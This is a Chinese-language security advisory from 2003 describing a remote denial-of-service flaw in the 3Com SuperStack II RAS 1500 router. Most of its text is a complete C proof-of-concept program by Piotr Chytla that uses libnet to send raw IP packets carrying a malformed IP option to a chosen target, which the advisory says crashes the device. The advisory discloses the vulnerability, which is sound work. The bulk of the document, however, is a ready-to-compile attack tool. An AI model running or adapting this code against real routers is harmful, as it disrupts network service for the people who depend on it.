3Com SuperStack II RAS 1500恶意IP头拒绝服务漏洞发布时间:2003-03-24 更新时间:2003-03-30 严重程度:高 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:7175 受影响系统 3com SuperStack II RAS 1500详细描述 3Com SuperStack II RAS 1500路由器存在漏洞,由于不正确处理包含恶意IP头的网络包,当接收这些包的时候,设备将会崩溃。 测试代码 Piotr Chytla(pch@isec.pl) 提供了如下测试程序: /* * 3com superstack II RAS 1500 remote Denial of Service * * Piotr Chytla <pch@isec.pl> * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2003 Copyright by iSEC Security Research */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <libnet.h> #define OPT_LEN 4 void usage() { printf("Args: \n"); printf("-s [source address]\n"); printf("-d [destination address]\n"); } int main(int argc,char *argv[]) { char a; int sock,r; u_long src; u_long dst; char pktbuf[IP_MAXPACKET]; char payload[]="ABCDEFGHIJKLMNOPRST"; u_char options[4]; struct ipoption ipopt; bzero(options,OPT_LEN); while((a=getopt(argc,argv,"d:s:h?"))!=EOF) { switch(a) { case 'h' : { usage(); exit(1); } case 's' : { src=libnet_name_resolve(optarg,0); break;} case 'd' : { dst=libnet_name_resolve(optarg,0); break;} } } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock<0) { perror("socket"); exit(1); } libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf); memcpy(ipopt.ipopt_list, options, OPT_LEN); *(ipopt.ipopt_list) = 0xe4; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf); if (r <0) { libnet_close_raw_sock(sock); printf("Error ip options insertion failed\n"); exit(1); } r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload)); if (r<0) { libnet_close_raw_sock(sock); printf("Error write_ip \n"); exit(1); } libnet_close_raw_sock(sock); return 0; } 相关信息 报告:Piotr Chytla <pch@isec.pl> 相关资料:http://online.securityfocus.com/archive/1/316043 |
